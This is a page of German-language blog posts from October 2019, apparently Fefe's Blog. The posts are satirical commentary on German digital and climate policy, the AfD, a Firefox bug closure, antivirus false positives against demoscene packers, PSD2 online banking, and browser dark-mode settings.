[l] Altmaier ist auf dem Digitalisierungsgipfel von der Bühne gestürzt, musste per Rettungswagen ins Krankenhaus gefahren werden.
Man soll ja über sowas keine Witze machen, aber gewisse Parallelen zur Digitalisierungspolitik der Bundesrepublik Deutschland drängen sich ja schon auf.
Was mir in letzter Zeit immer deutlicher auffällt übrigens: Eine der prägenden Erinnerungen meiner Kindheit war, wie wir im Westen uns über das hohe Alter der Politiker im Osten und in der Sowjetunion lustig gemacht haben. Wie wir deren fortgeschrittenes Alter für symptomatisch für deren Realtätsabstand hielten.
Der Altmaier, unser Digitalisierungsfachmann, ist 61.
Würde der eine Digitalisierung überhaupt erkennen, wenn sie vor ihm stünde?
[l] Viele Beobachter (ich hoffe nicht Leser!) scheinen mit meiner Äußerung überfordert zu sein, dass die No-Platform-Strategie gegen die AfD nicht funktioniert.
Die halten mir entgegen, dass die AfD doch voll viel Talkshowzeit gekriegt hätte.
Die Argumentation geht dann: Schau, wenn die so viel Talkshowminuten hatten, dann sind sie ja offensichtlich nicht ausgegrenzt worden, jedenfalls nicht genug.
Hier liegt glaube ich ein Missverständnis vor. Ich versuche das mal aufzuklären.
Wenn meine Strategie gegen Mäuse in der Wohnung ist, die auszuhungern, indem ich kein Essen rumliegen lasse, aber die finden trotzdem genug Nahrung, dann ist meine Strategie gescheitert. Sind wir uns da einig? Ja? Gut.
Genau so ist das hier auch mit der AfD. Du kannst mit deiner Strategie nur das Handeln derer bestimmen, die mitmachen. Wenn deine Strategie auf Exklusion basiert, aber nicht genug mitmachen, dann wirkt sie nicht.
Ihr könnt mir noch folgen? Ja? Gut.
Da könnt ihr jetzt lamentieren, dass nur mehr mitmachen müssten. Klar. Stimmt vielleicht auch. Da haben wir eine fundamentale Meinungsverschiedenheit. Ich glaube, Ausgrenzen ist nicht die Lösung, weil die dann Parallelgesellschaften aufbauen, und ihr nicht mal mitkriegt, wie groß deren Bewegung inzwischen geworden ist. Aber das ist ja hier nicht die Frage. Eure Strategie scheitert schon daran, dass ihr sie nicht umgesetzt kriegt.
Da gibt es jetzt mehrere Perspektiven auf das Problem.
1. Die Strategie hätte funktioniert, aber es gibt in unserer Mitte Verräter, die nicht mitgemacht haben. Die müssen wir bekämpfen.
2. Die Strategie hätte funktioniert, aber es gibt in unserer Mitte Linke, die wir noch nicht erreicht haben mit unseren Argumenten. Die müssen wir überzeugen.
3. Die Strategie war fundamental falsch. Wir müssen was anderes probieren.
4. Die Strategie war richtig. Wir pullen jetzt einen Kohl und sitzen das aus, bis die Realität sich unserer Wunschvorstellung angepasst hat.
Ich persönlich glaube, dass die Strategie fundamental falsch war, weil sie dazu geführt hat, dass nicht die Argumente und Darstellungen der Rechten bekämpft wurden sondern die Rechten. Man muss aber die Ideen bekämpfen, nicht die Leute. Wenn Hitler im 1. Weltkrieg seinen Verletzungen erlegen wäre, glaubt ihr ernsthaft, dass es dann keine Nazis gegeben hätte? Da wäre halt jemand anderes der Führer geworden dann! Himmler oder so. Es gab echt genug Nazis damals.
Welche Ideen meine ich denn hier konkret? Na z.B. dass die Ausländer uns unsere Arbeit / Frauen / Zukunft wegnehmen. Es gibt da ein Video von Gysi zu dem Thema. Der ist aber auch der Einzige, der mir gerade einfällt, der die Ansichten der Rechten mal inhaltlich bekämpft hätte. Glaubt ihr ernsthaft, das AfD-Problem wäre gelöst, wenn der Höcke morgen bei einem Autounfall umkäme? Das Problem ist doch nicht die Person Höcke oder überhaupt irgendeine Person!
Meine Beobachtung im Moment ist, dass viel zu viele Linke die Variante 1 wählen und sich gegenseitig zerfleischen. Das ist nun offensichtlich die schlechteste Variante von allen. Nicht nur bekämpft dann niemand die Ideen der Rechten, sondern ihr schwächt auch noch deren Opposition.
Für Perspektive 2 ist es glaube ich zu spät, weil zu viele Anwendungen von Perspektive 1 alle vergrault haben, die es zu überzeugen gegeben hätte. Hätte euch doch nur jemand gewarnt!!1!
Für Aussitzen ist es augenscheinlich ein bisschen zu spät. Aussitzen ist eine gute Strategie, wenn sich die Welt in die richtige Richtung bewegt, und das Problem von alleine weniger wird. Das ist hier offensichtlich nicht der Fall.
Bleibt eine Perspektive: Die Strategie war falsch.
Wenn ihr mir bis hier folgen konntet, können wir ja mal eine Debatte anfangen, was die richtige Strategie wäre.

Mon Oct 28 2019

[l] Ich hatte bei Firefox wegen Copy&Paste einen Bug aufgemacht. Der ist natürlich (wie zu erwarten war) sofort als "invalid" geschlossen worden.
Aber die Begründung ist bemerkenswert:
This is expected, and works the same way in other browsers.
"This is expected" hätte ich ja an deren Stelle aus taktischen Gründen lieber als "I was just following orders" formuliert. Damit man in Zukunft nicht mit heruntergelassenen Hosen dasteht, sollte man wenigstens so tun, als sei man nur widerwillig gefolgt.
Aber "die anderen machen das auch so" finde ich an der Stelle bizarr. Ich weiß ja nicht, wie es euch geht, aber wenn ich mal zurückdenke, wieso ich Firefox einsetze, dann sind das alles Dinge, bei denen Firefox die Spec gebrochen und Dinge anders gemacht hat als die anderen Browser.
Firefox hatte als erster Browser einen Popup-Blocker. Erinnert man sich heute kaum noch dran. Früher haben Webseiten ungefragt weitere Browserfenster aufgemacht, im Allgemeinen mit Werbung drin. Das folgte auch der (schlechten) Spec und alle haben es so gemacht.
Dann hat Firefox mir einen Weg gegeben, 3rd party cookies zu blocken. 3rd party cookies folgen auch der Spec und die anderen Browser machen es auch so.
Dann hat Firefox ein API für Browser-Erweiterungen gebaut, mit dem ich einen Adblocker installieren konnte. Werbung war auch Spec-konform und alle anderen Browser haben auch Werbung angezeigt.
Dann hat Firefox einen Tracker-Schutz eingebaut. Web-Tracker entsprechen auch der Spec und die anderen Browser machen das auch so.
Mir ist echt nicht klar, was die sich bei Firefox denken, wenn die so eine Ausrede zu Protokoll geben. Ich vermute: Nicht viel.

Sun Oct 27 2019

[l] Ich würde mich ja über Altmaiers Europa-Cloud "Gaia X" lustig machen, aber das Projekt hat offensichtlich nicht den Hauch einer Chance.
Altmaiers Behörde habe "in den vergangenen Wochen gemeinsam mit zahlreichen Akteuren aus der Wirtschaft die ersten Schritte hin zu einer vernetzten Dateninfrastruktur für Deutschland und Europa erarbeitet", hieß es aus dem Ministerium.
Es wäre großartige Satire, wenn es nicht ernst gemeint wäre. Oh, ach, JETZT kümmert ihr euch um Vernetzung? Bisher gibt es keine vernetzte Dateninfrastruktur in Europa? Meine Güte, wie lange habt ihr an dem Projekt geplant? 50 Jahre?
In dem Papier wird eine vernetzte Dateninfrastruktur als "Wiege eines vitalen, europäischen Ökosystems" bezeichnet, "in dem Daten sicher und vertrauensvoll verfügbar gemacht, zusammengeführt und geteilt werden können".
Und das ist, wieso ich weiß, dass das keine Chance hat.
Niemand hält die Behörden für sicher oder vertrauenswürdig.
Niemand will Daten teilen. Erst Recht nicht mit Behörden.
Und bei Daten verfügbar machen und zusammenführen will niemand auch nur an die Existenz von Behörden erinnert werden.
Und mal ganz abgesehen davon hat der Altmaier erst Solar und dann Windenergie kaputtgemacht. Mit dessen Behörden, Projekten und Ideen würde ich ganz sicher nicht zusammen gesehen werden wollen. Der ist der Darth Vader der europäischen Klimapolitik.
[l] Habt ihr euch auch solche Sorgen um Sigmar Gabriel gemacht?
Jetzt wo der bei der SPD raus ist? Was soll der denn noch machen? Wer nimmt denn einen ausgebrannten Sozialdemokraten? Die Lottogesellschaften sind schon voll mit abgehalfterten SPDlern besetzt!
Keine Sorgen, der Siggi, der kam doch aus Niedersachsen. Niedersachsen hat, äh, gute Beziehungen zur Automobilindustrie! *hust*
Da findet sich schon was!
Der frühere SPD-Vorsitzende Sigmar Gabriel gilt seit Wochen als Favorit für das Präsidentenamt des mächtigen Automobilverbandes VDA.
Na siehste!
[l] Leserbrief zu "deine Domain hat Malware" von einem Demo-Coder:
Zum Thema "Schlangenöl nimmt Webseite als Geisel und verhindert, dass Leute mit gängigen Browsern sie überhaupt zu Gesicht bekommen" möchte ich dir über meine Erlebnisse erzählen. Betrachte dich also bitte als Kummerkasten ;) Vielleicht findest du aber auch den ein oder anderen (Ab-)Satz für deine Leser interessant; in diesem Falle: bedien dich. (Und spring' von mir aus gleich zum TL;DR am Ende :)
Im Vorfeld: Ich bin, was amoklaufende Virenscanner angeht, schon einiges gewohnt. Ich bin in der Demoszene aktiv (also jetzt nicht der mit den brennenden Autos, sondern der mit den Grafikdemos), insbesondere im Bereich 4k- und 64k-Intros, also Demos mit einer Größenbeschränkung auf wenige Kilobyte. Da kommen praktisch immer sehr spezielle Laufzeitpacker wie "Crinkler" (http://www.crinkler.net/) und "kkrunchy" (http://www.farbrausch.de/~fg/kkrunchy/) zum Einsatz, um noch das letzte Byte herauszukitzeln. Dummerweise haben wohl auch mal Malware-Autoren diese Packer zur Obfuscation benutzt, und da Schlangenöl-Hersteller das Brett an der dünnsten Stelle bohren, haben sie, anstatt die Malware ordentlich zu analysieren, einfach die Packer auf die schwarze Liste gesetzt. Da ich selbst ein paar mit besagten Packern komprimierte, aber an sich völlig harmlose 4k- und 64k-Intros auf meiner Webseite hoste, habe ich schon mehrfach von meinem Hosting-Provider böse Mails bekommen, ich möge doch binnen X Stunden meine Site saubermachen, sonst wird sie vom Netz genommen. Bisher ist das immer mit einer erklärenden Mail aufzulösen gewesen, zum Glück.
Andere Demoszener haben übrigens angefangen, ihre Intros in einer Form zum Download anzubieten, die automatisches Scanning unmöglich macht. Standard sind inzwischen ZIP-Archive, in denen die EXE-Dateien verschlüsselt abgelegt sind, und der Key steht in einer readme.txt oder so. Oder, ein besonders schräger Hack: Da liegt das Executable im Download-Archiv einfach ohne die "MZ"-Signatur (also die ersten zwei Bytes jedes Windows-Executables) vor. Erst eine mitgelieferte .bat-Datei klebt Header und Rest wieder zusammen und erzeugt eine gültige Windows-EXE.
Aber ich schweife ab.
Irgendwann wurde es jedenfalls mit den Fehldetektionen noch schlimmer und Nutzer wurden daran gehindert, auch meine "normalen" Utilities, die nichts mit der Demoszene zu tun haben, herunterzuladen. Beliebte Ziele sind ein Tool, das in Python geschrieben ist und das ich für faule Windows-Nutzer mit einem Standard-Programm(!) in eine einzelne EXE verpackt habe. Oder ganz normale, mit Microsoft Visual C++ compilierte Executables.
Auch Google hatte mich schon immer auf dem Kieker. Der Aufruf des Verzeichnisses auf dem Server, in dem die Downloads lagen, führte schon länger bei Chrome-Nutzern zum gefürchteten "roten Bildschirm". Das war mir noch egal, aber vor zwei Wochen begann Google damit, meine gesamte .de-Domain als gefährlich einzustufen — einschließlich *aller* Subdomains, nicht nur der, wo das (angeblich) gefährliche Zeug lagert! Selbstverständlich wurde ich darüber nicht informiert (Mail an webmaster@meinedomain.de oder so? I wo!), ich habe es von Nutzern meiner anderen Webdienste erfahren, die auf anderen Subdomains liegen sind als der persönliche und Demoszenen-Kram.
Nun gibt es bei Google keine öffentliche, funktionierende Möglichkeit, "false positives" zu melden. Es gibt Dokumentation für Webmaster, was man tun soll, wenn Google Malware auf der eigenen Domain erkannt hat, aber die geht stets davon aus, dass man wirklich mit irgend einem Wurm infiziert ist. Die Option auf eigenen Irrtum scheint Google gar nicht zu kennen. Vor allem kriegt man nicht einmal heraus, *welche* konkreten Inhalte denn als schädlich erkannt wurden.
Es gibt aber eine Möglichkeit, nämlich die "Search Console". Um die zu nutzen, muss man sich gegenüber Google mit einem permanentem DNS-TXT-Record als Besitzer der Domain ausweisen (wohl dem, der die DNS-Records seiner Webseite unter Kontrolle hat!). Die Console selbst ist eher für SEO-Kram gedacht, aber da gibt es auch einen Menüpunkt "security issues" und tatsächlich stehen dort mal ein paar konkrete URLs von angeblich bösen Inhalten. Überraschenderweise waren das bei mir nicht die erwartete Handvoll Demoszenen-Intros, sondern nur eine zehn Jahre alte .tar-Datei mit einer Library, die als Beispielprogramm ein kkrunchy-gepacktes Windows-Executable enthielt. (Das Programm selbst war völlig harmlos: Es handelte sich um einen schlichten MP3-Player.) Nun ja, da gibt es einen "I have fixed the issues, request review"-Button, also hab' ich den mal gedrückt und im Freitextfeld eingegeben, dass es ein "false positive" ist (mitsamt ein paar Erläuterungen, wie was wo warum). Zwei Tage später die Antwort: Meinem Review Request konnte nicht stattgegeben werden, die Malware sei immer noch da. Die haben meine Erklärung gar nicht gelesen! Also habe ich die inkriminierende EXE-Datei aus dem Archiv entfernt und das Archiv zudem umbenannt (die ganze Library ist eh' obsolet). Nochmal "request review" gemacht, mit Freitext "ich hab's jetzt entfernt, aber ehrlich jetzt, Jungs, das wäre gar nicht nötig gewesen, weil …". Daraufhin: Nichts. Eine Woche lang keine Reaktion. Nach einer anderthalben Woche schaue ich nochmal in die Search Console, und siehe da: Jetzt ist ein anderes Programm der Stein des Anstoßes. Eins, das vorher schon da war. Eins, das nichtmal Crinkler oder kkrunchy benutzt, sondern schlicht UPX, den bekanntesten Executable-Packer überhaupt. Ein Bildbetrachter, in C++ geschrieben, mit Visual Studio compiliert und statisch gegen libjpeg-turbo und die Microsoft Visual C++ Runtime gelinkt. Das reicht also heutzutage aus, um mit einer ganzen Domain auf dem Malware-Index zu landen!
Zum Glück war das nur eine Testversion, also konnte ich die gefahrlos löschen und wieder den "request review"-Affentanz aufführen. Jetzt ist meine Domain erstmal wieder als unbedenklich markiert, aber für wie lange?
TL;DR: Alles Scheiße.
Takeaway #1: Wenn Google deine Domain wegen angeblicher Malware-Infektion hops nimmt, erfährst du es nur indirekt von deinen Nutzern (außer du nutzt selbst Chrome mit aktiviertem "ich schicke erstmal jede aufgerufene URL an Google"-Phishing-Schutz, aber hey, das tust du natürlich nicht). Wenn du wissen willst, wo Google denn nun genau Malware auf deiner Domain gefunden hat, musst du an deinem DNS herummanipulieren und einen Google-Account haben, um die "Search Console" benutzen zu können. "False Positives" reporten geht nicht: Derlei Anfragen werden ignoriert, also lösch den Kram oder fuck you.
Takeaway #2: Es braucht nicht viel, um Schlangenöl zu triggern, deine (Windows-)Software als Malware zu erkennen.
- Laufzeit-Packer verwendet? Verdächtig!
- C-Library statisch gelinkt? Verdächtig! (siehe https://twitter.com/KeyJ_trbl/status/1138885991517839360 — selbst ein verdammtes "Hello World"-Programm wird schon von diversen Schlangenöl-Anbietern als Malware erkannt!)
- Python-Software mit PyInstaller (einem Standard-Paket in der Python-Welt) in eine einzelne Windows-EXE verpackt? Verdächtig! Wenn man (wie ich) möglichst kompakte Software für Windows (nur eine EXE-Datei, keine weiteren Dependencies) schreiben und veröffentlichen möchte, ist man quasi am Arsch.
Lacher am Rande: Die Schlangenöl-Community macht das auch so. Die müssen sich ja auch ihre Samples gegenseitig zuschicken. Die tun das auch in ZIP-Files mit Standardpasswort.
Ich hab mich da immer aus der Ferne drüber totgelacht.
Mal ganz neutral analysiert ist das natürlich ein weiterer Fall von Externalisierung von Kosten. Wenn ich mir einen wirtschaftlichen Vorteil verschaffe, indem ich die durch meine Aktivitäten entstehenden Kosten Anderen aufdrücke. Wie bei Umweltverschmutzung und Atommüll. Die Tech-Riesen bieten einen Mail-Service an, und externalisieren die Spam-Kosten auf den Rest der Welt.
Ach ICH soll mir jetzt irgendwelche DNS-Records anlegen, und meine Mails vom Mailserver mit einem Domainkey digital signieren lassen, um EUER Spamproblem für euch einfacher lösbar zu machen? Go fuck yourself!
Oh aber selbst habt ihr nicht mal eine funktionierende abuse@-Adresse, wo man sich über von euch ausgehenden Spam beklagen könnte? Go fuck yourself!
Ihr verkauft Schlangenöl, das prinzipiell seine Funktion nicht erfüllen kann, und die Kosten für False Positives externalisiert ihr an … mich? Go fuck yourself!
Ich glaube, wir brauche mal eine Behörde für Digitalumweltschutz, die solche Geschäftsmodelle systematisch aus dem Verkehr zieht. Alle solche Firmen systematisch zumachen. Eine nach der anderen. Wer Kosten externalisiert, wird zugemacht. Und der Aufsichtsrat / der CEO / die Gründer / die Investoren sind persönlich haftbar für die Verfahrenskosten.
Ja aber Fefe wenn wir die ganzen Kosten selber tragen müssten, dann würde sich unser Geschäftsmodell nicht tragen!!1!
Wenn sich euer Geschäftsmodell nur durch Externalisierung von Kosten trägt, DANN TRÄGT ES SICH GAR NICHT. Man stelle sich mal vor, ein Wurstproduzent würde so argumentieren! Ja klar könnte ich hier Hygienestandards erfüllen, aber dann wäre das nicht profitabel!!1! Da würde doch niemand auch nur eine halbe Sekunde zögern, den aus dem Verkehr zu ziehen!
Ja klar könnten wir auch Bremsen in die Autos einbauen, aber dann wären wir preislich nicht mehr konkurrenzfähig!1!!
Unfassbar.

Fri Oct 25 2019

[l] Wie heißt es so schön auf Englisch? 42.zip is the gift that keeps on giving.
ich hab noch eine Geschichte zur 42.zip von Microsoft Security Essentials: vor ein paar Jahren hatte ich mal die 42.zip runtergeladen. MSE hat es auch als Schadsoftware erkannt. Ich hatte die Datei dann erlaubt - und damit MSE unbrauchbar gemacht, denn MSE wollte die Datei dann trotzdem weiter untersuchen. Und "untersuchen" heißt da wohl zumindest im Speicher entpacken.
Damit waren dann RAM und ein CPU Kern ausgelastet. Japp, MSE hat die Datei als Zip-Bombe erkannt aber trotzdem versucht sie zu entpacken - und wollte auch nichts anderes mehr tun. Die Datei löschen hat nicht geholfen, in MSE konnte ich mit der Datei auch nicht löschen oder in Quarantäne schieben oder so. Also hab ich den Support von Microsoft gefragt. Die sahen aber kein Problem drin, dass MSE nun funktionsunfähig war und meinten nur sinngemäß "selber Schuld". Nach einigem suchen hab ich dann eine Lösung gefunden: MSE hat den erkannten Virus kopiert damit er nicht versehentlich verloren geht. Als ich das Verzeichnis gefunden hab und die Datei dort gelöscht hab konnte sich MSE wieder auf andere Dinge konzentrieren.
Und
das könnte dir in dem Zusammenhang gefallen: Der Brave-Browser verbietet mir auch, 42.zip herunterzuladen.
Kein Schlangenöl im System, aber offensichtlich im Browser. Gnah...
Und
Auch der T-Online Mailer (und sonstige ranzige E-Mail Provider) blocken 42.zip, und sogar beliebige .exe Dateien und man kann es nirgends ausschalten. Das Abuse Team kapiert bei Nachfrage ueberhaupt nicht wo das Problem liegt... weil "Sicherheit"... :)
Ich finde das nur konsequent. Man kriegt ja von Internet-Providern auch kein Internet mehr sondern nur irgendeinen 192.168.*- oder 10.*-Scheiß.
Wieso tut da eigentlich kein Verbraucherschützer was gegen?
Wenn man dann wenigstens ordentliches IPv6 auf der Leitung hätte, könnten wir reden, aber häufig gibt es nicht mal das.
Update: Zur allgemeinen Belustigung: Virustotal darauf.
[l] Zur Gemeinnützigkeit kam noch folgender Hinweis rein: Hier hat jemand mal eine Studie dazu gemacht. Die haben Unterlagen für drei Mustervereine vorbereitet und die als Anträge an alle Finanzämter Deutschlands geschickt, um zu gucken, wie weit die sich einig sind in ihren Bewertungen.
Schon die drei Mustervereine haben es in sich:
- Der Verein „Musik ist Leitkultur“ will Kunst und Kultur fördern und sich dazu für ein Bundesgesetz zur Musikschul-Finanzierung einsetzen.
- Der Verein „Europäische Demokraten“ möchte sich für die freiheitlich-demokratische Grundordnung und eine EU nach dem föderalen Muster der Bundesrepublik Deutschland einsetzen.
- Der Verein „Farbiges Deutschland“ wendet sich gegen die Diskriminierung auch deutscher Staatsbürger*innen aufgrund ihrer Hautfarbe, vor allem im Berufsleben.
Ergebnis: 70% fanden "Europäische Demokraten" gemeinnützig, nur 42% "Farbiges Deutschland" und 48% "Musik ist Leitkultur".
Die Ablehnungen beim Verein „Musik ist Leitkultur“ (48 Prozent) wurden größtenteils damit begründet, dass der Verein Lobbyarbeit betreibe und auf die politische Willensbildung Einfluss nehmen wolle.
Sehr geil auch: Das Bundesfinanzministerium hat Wind von der Studie gekriegt und dann weitere Beantwortungen gestoppt, bevor es noch peinlicher wurde.
Ein Vertreter des Bundesfinanzminis-teriums geißelte die Briefe als „Fake-Anfragen“.
Ja gut, dass ein Vertreter des Bundesfinanzministerium Wissenschaft nicht erkennt, wenn sie vor ihm steht, das überrascht mich jetzt nicht weiter. (Danke, Felix)
[l] Der Anwalt, der bei Apple für das Verhindern von Insider-Trading die Compliance gemacht hat, wurde jetzt wegen Insider-Trading verurteilt. *badumm tsss*

Thu Oct 24 2019

[l] Gute Nachrichten: Meine KI-Sorgen waren unbegründet. Die OMG kümmert sich und fährt das übliche OMG-Zersetzungsprogramm. Die OMG ist für Software sowas wie die Weltbank für Staaten. Wenn die zugreifen, wächst kein Gras mehr. Die machen lauter wohlklingende Vorschläge, von wegen "wir machen das jetzt mal ordentlich, mit Standardisierung und Meetings und Kommitees und allem pipapo", aber von ihren Patienten hat noch keiner die Therapie überlebt.
Ich hatte mich 2005 mal über die lustig gemacht, und die fragliche Seite existiert immer noch. Ist halt eine ordentliche Bürokratur, da kommt nichts weg.
OMG is where ideas go to die.

Mon Oct 21 2019

[l] Wenn ihr Online-Banking macht, wird euch aufgefallen sein, dass die gerade ohne Not euer Online-Banking kaputtgemacht haben, sinnlose neue Security-Theater-"Features" erzwingen und dabei für euch insgesamt kein Sicherheitsgewinn abfällt.
Ich habe daher ein paar Kollegen befragt, die sich mit sowas auskennen, wieso wir das eigentlich überhaupt gekriegt haben.
Die Antwort könnte die Bevölkerung verunsichern.
```
Kollege1: Fefe: SOFORT-"bank" legalisieren und schufa im business halten
Kollege2: was Kollege1 sagt
Kollege1: Fefe: ziemlich genau das ist die anforderungsdefinition
Kollege1: "Zahlungsauslösedienste" und "Kontoauskunftsdienste"
Kollege2: Kontoinformationsdienste bitte
Kollege1: pardon
Kollege2: also ich stelle mir das so vor:  Schritt 1: Dings und Bums legalisieren. Schritt 2: Hmm, wir müssen uns irgendwas einfallen lassen, das als Sicherheit zu verkaufen. Schritt 3: Alles andere kaputmachen.
Fefe: na meine daten ohne mein einverständnis weggeben wäre auch gegangen, ohne mein ui anzufassen
Kollege2: Fefe: nene, muss ja mit deinem einverständnis sein!
Fefe: IST ES ABER NICHT
Kollege2: doch doch, du musst einmal (im laufe der zahlungsabwicklung ggbf) zustimmen
```
Als wenn das noch nicht schlimm genug ist: Die Schweiz lacht sich kaputt über unsere Idiotie und sagt an:
Die PSD2-Regulierung der EU gilt nicht für die Schweiz. Die Schweiz setzt auf marktwirtschaftliche Lösungen.
Es sah ja eine Weile so aus, als ob das Schweizer Bankgeheimnis und damit Schweizer Banking als (aus welchen Gründen auch immer) attraktive Option für EU-Bürger tot ist.
Welch selbstloser Akt der Selbstaufopferung auf Seiten der EU! Die haben wahrscheinlich beim letzten "Stabilitätstest" gesehen, dass die europäischen Banken eh alle so gut wie tot sind, und haben sich gedacht: Dann sorgen wir lieber dafür, dass die Leute in der Schweiz ein Konto haben, damit sie eine Chance haben, den Kollaps zu überleben.
Ich bin jedenfalls gerade ernsthaft am überlegen, ob ich nicht in der Schweiz ein Konto aufmache, um diesem nicht enden wollenden Bullshit-Tsunami zu entgehen, mit dem die Banken mich erst von Papier-TANs zu Chip-TANs, dann von Chip-TANs zu Mobile-TANs und jetzt von Mobile-TANs zu App-TANs genötigt haben, und jeden Schritt des Weges ist für mich das Verfahren untransparenter und unsicherer geworden. Ich hab echt die Schnauze voll.
Das geilste ist ja immer, wenn die Banken sich dann wundern, wieso die Leute zu N26 und co gehen.
[l] Damit hier nicht immer nur negative Meldungen kommen:
Bank of America's CEO says that it's saved $2 billion per year by ignoring Amazon and Microsoft and building its own cloud instead
Das klingt erst wie eine Unmöglichkeit, weil Banken ja überhaupt nicht mit Geld umgehen können. Aber genau das ist hier der Einsparhebel gewesen. Die haben nicht Geld gespart, weil sie nicht in die Cloud gegangen sind, sondern weil sie ihre vorher 200k Server auf 70k eingedampft haben und von ihren 60 Rechenzentren jetzt runter auf 23 sind.
Da war so viel überflüssige Geldverschwendung drin, dass wenn man da eine Schrotflinte nimmt und in die Menge schießt und die toten Server vorsichtig rauszieht, dass der Rest immer noch problemlos die ganze Last stemmen kann.
Trotzdem, 2 Milliarden klingt ja schon substanziell. Was haben die denn da für Budgets, dass so viel Einsparung überhaupt möglich ist?
The bank, which has a $10 billion annual tech budget
Und das, meine Damen und Herren, meinte ich mit "Banken können nicht mit Geld umgehen". Was macht man mit so viel Budget? Das kann man ja kaum für IT ausgeben. Und tatsächlich. Damit kaufen die keine IT-Geräte. Damit kaufen sie IT-Firmen.
Wer sich jetzt denkt, hach, endlich mal eine herzerwärmende, positive Story bei Fefe, den muss ich leider enttäuschen. Hier ist die Punchline:
Right now, the bank estimates its private cloud is 25 to 30% cheaper than public providers, though it also recognizes that probably won't last forever. Still, the company believes the architecture it has built will give it leverage in negotiating contracts with these companies — a process that is already under way, Moynihan said.
Das hat er nicht gemacht, weil das eine schlaue Idee ist, sondern weil er Verhandlungsmasse für den Cloud-Umstieg brauchte.
Dem hat wohl noch keiner gesagt, dass die Preise bei der Cloud am Anfang egal sind. Die würden dich noch dafür bezahlen, dass du zu ihnen in die Cloud kommst. Die echten Preise kriegst du dann aufgerufen, wenn du dich vollständig abhängig gemacht hast.
Schöne Server haben Sie da! Wäre ja schade, wenn die nur 100 GB Highspeed-Bandbreite zum Storage hätten!
Früher hätte man das mit Drogendealern verglichen. Heute sind Telcos glaube ich der bessere Vergleich für ein fundamental unmoralisches Geschäftsmodell.
[l] Habt ihr euch auch schon über den CO2-Emissionshandel geärgert?
Im Grunde ist das ja Wirtschaftsförderung und hat nichts mit Umweltschutz zu tun. Stattdessen garantiert man damit, dass die Einsparungen bei uns durch eine entsprechende Mehremission im Ausland rückgängig gemacht werden.
Ich sah gerade eine Argumentation eines CSU-nahen Juristen, der auch ansonsten recht AfD-nahe Klimapositionen zu vertreten scheint, der deshalb argumentierte, der Staat müsse den Windenergieausbau stoppen, denn das Errichten der Windräder verursache ja Umweltschäden, und den Nutzen negieren wir mit dem Emissionshandel wieder, daher sei das Netto negativ.
Das finde ich ein prima Argument. Nicht gegen den Ausbau der Windenergie, natürlich, sondern für den Abbau des Emissionshandels.
Update: Ich empfehle dazu übrigens die aktuelle Folge der Anstalt, die auch schön erklärt, wie Herr Altmaier den Planeten kaputtmacht.

Sun Oct 20 2019

[l] Wo wir gerade am Meckern sind: Wieso hat Firefox eigentlich unter Linux keinen Weg, den Dark Mode anzuschalten?
Mein Blog unterstützt das jetzt in den ganzen CSS-Varianten, die ich gemacht habe (und nicht eingeschickt wurden), und ich kann unter Linux nicht nutzen.
In about:config gibt es ein Setting browser.in-design.dark-mode, aber das schaltet nicht den Dark Mode an, sondern sagt Firefox, dass er das in die Webseiten propagieren soll, wo man es im CSS abfragen und reagieren kann. Aber wie man es anschalten soll, darüber hat offenbar noch keiner nachgedacht.
For the record: In chrome kann man das über die Kommandozeile anschalten:
```
--enable-features=WebUIDarkMode --force-dark-mode
```
Die offizielle Antwort scheint zu sein, dass man eine Webextension installiert. m(
Update: Ein Leser hat die Lösung: Man muss einen neuen Key anlegen: ui.systemUsesDarkTheme = 1
Das funktioniert hier auch gerade tatsächlich.
[l] Nachdem: Jemand cybert Saudi Arabiens Ölinfrastruktur kaputt.
Jetzt: Jemand cybert Irans Ölinfrastruktur zurück.
Wenn nicht so offensichtlich wäre, dass die sich gegenseitig cybern, könnte das eigentlich ein toller Plot für die vor zehn Jahren vieldiskutierten "Bioterroristen" sein, vor denen sich damals alle Sorgen gemacht haben. Ihr wisst schon, radikale Umweltschutzaktivisten. Sowas wie Extinction Rebellion, nur viel, viel schlimmer.
Aber stellt sich raus: Braucht man gar nicht. Die Terroristen in den Eliten, die seit Jahrzehnten den Planeten kaputtmachen, die machen sich auch gegenseitig kaputt. Die brauchen keine Hilfe von irgendjemandem.
Update: Ausführlichere Quelle.

Sat Oct 19 2019

[l] Erinnert ihr euch noch an früher? Als wir uns Sorgen gemacht haben, dass Wahlen mit Wahlcomputern gemacht werden könnten, und dann digital angreifbar wären?
Nun, heute finden Wahlen auf Amazon statt, also deren Cloud-Scheiß. Weil, äh, …
Some security experts like David O’Berry, co-founder, Precog Security, said moving to AWS is “a good option for campaigns, who do not have the resources to protect themselves.”
Das Argument finde ich immer die absolute Krönung. Kaufen Sie Ihre Bremsen bei uns! Klar können wir das nicht, aber Sie können das ja bestimmt noch weniger!!1!
Wie wäre es mit Mindest-Qualitätszusagen?
Wir so: Freie und Geheime Wahlen gehen nicht digital.
Die so: Ach komm, machen wir bei Amazon. Klar geht das bei denen auch nicht, aber immerhin waren es dann die, die verkackt haben, nicht wir!
Unfassbar. Wie sind wir eigentlich in diesen immerwährenden Absturz initial reingeraten? Ich bin ja auch kurz davor, die Hoffnung aufzugeben, dass da noch was zu reißen ist.
Ich erinnere mich noch an meine Jugend, als ich begeistert Cyberpunk-Romane gelesen habe. Ich fand das immer total geil, aber fand die Prämisse voll unglaubwürdig, dass eine Zivilisation freiwillig ihre Infrastruktur so auf Sand bauen würde, dass alles hackbar ist.
Tja.
Heute weiß ich, wie es dazu kommen konnte.
Wahrscheinlich muss man noch dankbar sein, dass sie mit Amazon und nicht mit McDonald's zusammenarbeiten. Die haben voll viele Filialen, da kann man toll Wahllokale unterbringen! Und jeder kriegt noch nen Burger vergünstigt!!1!
Update: Falls jemand die Referenz nicht mitgeschnitten hat: Siehe hier.

Thu Oct 10 2019

[l] Klimawandel-Infrastrukturapokalypse: In Kalifornien hat der Stromversorger die Wahl, ob er lieber Waldbrände verursacht oder seinen Kunden Strom liefert, entscheidet sich für Rolling Blackouts.
Kommt, Kinder, lasst uns noch ein paar Jahre diskutieren, ob der Klimawandel vom Menschen gemacht wurde oder nicht!1!!

Wed Oct 9 2019

